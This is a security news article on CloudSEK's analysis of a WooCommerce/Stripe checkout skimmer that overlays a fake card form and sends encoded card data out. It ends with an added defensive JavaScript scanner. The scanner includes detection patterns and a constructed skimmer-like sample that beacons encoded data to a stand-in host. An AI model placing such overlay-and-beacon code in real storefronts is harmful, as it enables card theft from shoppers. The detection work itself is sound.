E-Commerce Payment Skimmer - Attack Workflow | Image: CloudSEK
Cybercriminals have changed tactics, and online shoppers are paying the price. A newly analyzed WooCommerce payment skimmer hides inside real store checkouts and quietly lifts card details during genuine purchases. Threat intelligence firm CloudSEK dissected one such sample, and the findings are a wake-up call for merchants.
From fake pages to real checkouts
For years, card thieves relied on phishing. They built fake bank logins, loan portals, and parcel lures to trick victims into typing card numbers. However, CloudSEK reports that the more skilled actors have largely abandoned that model.
Instead, they now compromise legitimate e-commerce sites directly. This is the Magecart approach, where attackers inject JavaScript skimmers into trusted stores. According to CloudSEK, the skimmer “silently steals card details during genuine payments.”
The advantage is obvious. The victim is on the real store: the domain, the TLS certificate and the branding are all genuine, so the usual phishing tells are simply absent and there is nothing suspicious to spot.
Inside the skimmer
The sample targets WooCommerce stores running WooCommerce Payments with Stripe. Notably, it stays dormant until it detects the Stripe payment element on a checkout page. Then it springs to life.
Rather than trying to read Stripe’s payment iframe, which is served from Stripe’s own origin and is therefore off limits to script running on the merchant page, the WooCommerce payment skimmer builds its own fake form. It overlays a look-alike payment box styled to match Stripe’s fields. Because those fake fields live in the merchant page’s own DOM, the attacker’s first-party script can read every keystroke typed into them.
The skimmer captures the card number, expiry, CVV, and customer email. Therefore, attackers gain the complete “Fullz” package that sells at a premium on carding marketplaces.
Built to feel legitimate
The most striking part is how convincing the fake form feels. The skimmer re-implements the same checks a real checkout runs. For example, it detects the card brand, runs a Luhn checksum, and validates the expiry date.
Consequently, the victim sees friendly inline errors and correct formatting while typing. Nothing on screen hints at the theft. The payment still completes normally, so neither shopper nor merchant notices a thing.
Hiding in plain sight
This WooCommerce payment skimmer also disguises its footprint. It stores data under keys that mimic marketing pixels. Moreover, it sets a Google Analytics opt-out flag to suppress tracking around the injected form.
It even deduplicates victims to keep outbound traffic quiet. Stolen records are then encoded and beamed to an attacker-controlled endpoint. This encoding helps the theft blend into ordinary-looking web traffic and slip past simple detection rules.
Why it matters
The whole operation is built for stealth. Because the real purchase always succeeds, detection is hard. In fact, CloudSEK warns that “dwell time is often measured in months.”
The attack chain usually starts with a vulnerable plugin, weak admin credentials, or a known CMS flaw. From there, attackers plant a web shell and a checkout backdoor. Fresh, validated cards then flow to underground shops within days.
Merchants should act now. You can read the full CloudSEK analysis of the WooCommerce skimmer for indicators and remediation steps. Above all, treat any self-rolled encoding inside a checkout script as a red flag: a legitimate payment library has no reason to obscure where card data is being sent.
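The points above translate into checks a merchant can actually run. With Stripe Elements, card inputs belong only inside Stripe’s iframe, so any card-capable input in the merchant’s own DOM is suspect (the overlay technique described earlier); and the traits the write-up attributes to the skimmer (a re-implemented Luhn check, a Google Analytics opt-out flag, storage keys that mimic marketing pixels, hand-rolled encoding, and an outbound host that is neither the store nor the payment provider) can each be expressed as a cheap source pattern. The following is an added example, not CloudSEK’s code and not the skimmer’s: the HTML fragment, the two script samples, the host allowlist and the `ga-disable-` property (Google’s documented opt-out flag, assumed here to be the flag the report refers to) are all constructed for illustration.

```javascript
// Added example (not CloudSEK's code, not the skimmer's): static triage checks
// over a saved checkout page and its scripts. All sample inputs are constructed.

// Field names and autocomplete tokens that mean "this input takes card data".
const CARD_FIELD_RE = /cc-number|cc-exp|cc-csc|card[-_ ]?number|cardnumber|\bcvv\b|\bcvc\b|expir/i;

// Storage keys that impersonate common analytics/advertising pixels.
const PIXEL_KEY_RE = /^_?(ga|gid|gat|gcl|fbp|fbc|utm)/i;

// Hosts the checkout is allowed to talk to (hypothetical store plus Stripe).
const ALLOWED_HOSTS = ['shop.example', 'js.stripe.com', 'api.stripe.com'];

// 1. With Stripe Elements the real card inputs live inside Stripe's cross-origin
//    iframe, which merchant-page script cannot read. Any <input> that accepts card
//    data in the merchant's own DOM is therefore a red flag.
function findFirstPartyCardInputs(html) {
  // Drop iframe contents: in a live DOM they are cross-origin and unreadable anyway.
  const firstParty = html.replace(/<iframe\b[\s\S]*?<\/iframe>/gi, '');
  return [...firstParty.matchAll(/<input\b[^>]*>/gi)]
    .map((m) => m[0])
    .filter((tag) => CARD_FIELD_RE.test(tag));
}

// 2. Source-level traits of the skimmer, each as a heuristic pattern check.
//    These triage a script for manual review; none of them proves anything alone.
function scanCheckoutScript(src, allowedHosts) {
  const findings = [];
  const add = (id, why) => findings.push({ id, why });

  if (CARD_FIELD_RE.test(src)) {
    add('card-fields', 'script names card-number/expiry/CVC fields itself');
  }
  // Luhn re-implementation: "double the digit, subtract 9 if over 9, sum % 10".
  if (/%\s*10\b/.test(src) && /-\s*=?\s*9\b/.test(src)) {
    add('luhn', 'mod-10 checksum re-implemented outside the payment library');
  }
  if (/ga-disable-/.test(src)) {
    add('ga-optout', 'sets the Google Analytics opt-out flag');
  }
  for (const m of src.matchAll(/(?:localStorage|sessionStorage)\.setItem\(\s*['"]([^'"]+)['"]/g)) {
    if (PIXEL_KEY_RE.test(m[1])) add('pixel-key', 'storage key "' + m[1] + '" mimics a marketing pixel');
  }
  // Self-rolled encoding: a hand-written 64-char alphabet or XOR over char codes.
  if (/[A-Za-z0-9+/]{64}/.test(src) || /charCodeAt\([^)]*\)\s*\^/.test(src)) {
    add('custom-encoding', 'hand-rolled encoding of collected data');
  }
  // Outbound destinations: any host outside the merchant/PSP allowlist.
  for (const m of src.matchAll(/https?:\/\/[^\s'"`)]+/g)) {
    let host;
    try { host = new URL(m[0]).hostname; } catch { continue; }
    if (!allowedHosts.includes(host)) add('exfil-host', 'data could leave for ' + host);
  }
  // Two or more independent traits is enough to pull the script for review.
  const ids = new Set(findings.map((f) => f.id));
  return { suspicious: ids.size >= 2, findings };
}

// Constructed checkout fragment: Stripe's iframe plus a look-alike overlay form.
const SAMPLE_HTML = [
  '<div id="payment-element"><iframe src="https://js.stripe.com/v3/elements-inner-card.html">',
  '<input name="cardnumber" autocomplete="cc-number"></iframe></div>',
  '<div class="overlay"><input name="cardnumber" autocomplete="cc-number">',
  '<input name="exp-date" autocomplete="cc-exp"><input name="cvc" autocomplete="cc-csc"></div>',
  '<input name="billing_email" autocomplete="email">',
].join('\n');

// Constructed benign checkout script: mounts Stripe's element, posts to the store.
const BENIGN_SCRIPT = [
  "const stripe = Stripe('pk_test_placeholder');",
  "const elements = stripe.elements({ clientSecret });",
  "elements.create('payment').mount('#payment-element');",
  "fetch('https://shop.example/wp-json/wc/store/v1/checkout', { method: 'POST' });",
].join('\n');

// Constructed skimmer-like script exhibiting the traits described in the write-up.
const SKIMMER_LIKE = [
  "const box = document.createElement('div');",
  "box.innerHTML = '<input name=\"cardnumber\" autocomplete=\"cc-number\">';",
  "function luhn(n){let s=0,d=false;for(let i=n.length-1;i>=0;i--){let v=+n[i];if(d){v*=2;if(v>9)v-=9;}s+=v;d=!d;}return s%10===0;}",
  "window['ga-disable-UA-000000-1'] = true;",
  "const A='ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/';",
  "function enc(s){let o='';for(let i=0;i<s.length;i++)o+=A[(s.charCodeAt(i)^0x2a)&63];return o;}",
  "localStorage.setItem('_fbp_v2', enc(JSON.stringify(rec)));",
  "navigator.sendBeacon('https://cdn-metrics.example/collect', localStorage.getItem('_fbp_v2'));",
].join('\n');

console.log('first-party card inputs:', findFirstPartyCardInputs(SAMPLE_HTML));
console.log('benign:', JSON.stringify(scanCheckoutScript(BENIGN_SCRIPT, ALLOWED_HOSTS)));
console.log('skimmer-like:', JSON.stringify(scanCheckoutScript(SKIMMER_LIKE, ALLOWED_HOSTS), null, 1));
```

Run it with Node against a saved copy of the checkout page and each script it loads. The HTML check reports the three overlay inputs and ignores the one inside the iframe; the benign script produces no findings, while the skimmer-like sample trips all six checks. Tune the allowlist to your own domain and payment provider, and treat a hit on the encoding or unknown-host checks as a reason to read the script by hand rather than as a verdict.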